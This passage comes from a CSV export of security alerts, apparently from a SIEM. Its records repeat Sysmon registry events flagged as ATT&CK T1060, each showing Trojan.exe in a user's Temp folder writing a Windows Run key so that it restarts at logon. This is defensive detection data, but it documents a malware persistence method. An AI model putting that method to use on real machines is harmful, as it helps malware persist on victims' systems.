Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:34.454",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:30.934 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:30.935736100Z"",""eventRecordID"":""1839"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:30.934\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:30.934"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:33.298",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:29.918 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:29.921317200Z"",""eventRecordID"":""1837"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:29.918\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:29.918"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:32.344",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:28.902 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:28.910730600Z"",""eventRecordID"":""1836"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:28.902\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:28.902"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:32.204",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:27.887 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:27.889382400Z"",""eventRecordID"":""1834"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:27.887\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:27.887"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:30.985",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:26.856 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:26.857190800Z"",""eventRecordID"":""1832"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:26.856\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:26.856"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:30.001",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:25.824 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:25.828220100Z"",""eventRecordID"":""1830"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:25.824\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:25.824"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:29.970",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:24.809 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:24.815717800Z"",""eventRecordID"":""1829"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:24.809\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:24.809"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:27.783",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:23.798 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:23.802274800Z"",""eventRecordID"":""1828"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:23.798\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:23.798"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:26.561",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:22.793 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:22.795561800Z"",""eventRecordID"":""1827"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:22.793\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:22.793"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:25.344",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:21.777 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:21.780218400Z"",""eventRecordID"":""1826"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:21.777\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:21.777"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:24.252",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:20.762 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:20.765650700Z"",""eventRecordID"":""1825"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:20.762\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:20.762"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:23.178",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:19.731 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: 